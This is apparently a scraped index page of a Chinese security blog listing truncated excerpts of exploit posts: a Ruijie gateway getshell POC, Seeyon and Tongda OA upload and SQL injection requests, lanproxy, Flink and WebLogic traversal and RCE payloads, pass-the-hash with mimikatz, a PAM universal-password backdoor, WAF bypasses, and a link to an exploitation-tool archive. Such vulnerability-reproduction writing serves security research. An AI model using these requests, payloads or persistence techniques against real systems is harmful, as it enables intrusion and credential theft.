https://www.o2oxy.cn/wp-content/uploads/2021/01/Java利用工具.zip
信息安全
锐捷网关系列通杀GetShell
https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...
致远OA 任意文件上传
老版本 POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application...
CVE-2020-3091 lanproxy 目录遍历
/../conf/config.properties GET /../conf/config.properties HTTP/1.1 Host: 192.168.10.10:881 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5...
Apache Flink CVE-2020-17519/CVE-2020-17518 漏洞复现
CVE-2020-17519 任意文件读取 https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 访问8081 端口 http:/...
内网hash 传递
首先通过mimikatz 抓取明文密码 mimikatz 1.通过wmiexec https://github.com/maaaaz/impacket-examples-windows python -m pip&nb...
内网技巧-Linux权限维持之PAM万能密码登录
原文地址:https://xz.aliyun.com/t/8618 试验环境:Centos8.2 pam版本1.3.1 [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 8.2.2004 (Core) [root@localhost ~]# r...
通达OA 后台SQL 注入
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest ...
CVE-2020-14882 weblogic 未授权命令执行复现
https://github.com/jas502n/CVE-2020-14882 weblogic 12 /console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol...
密码保护:bypass 各大waf
1. 百度云盾 (好像是CF的东西) POST POST / HTTP/1.1 Host: www.sglynp.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5....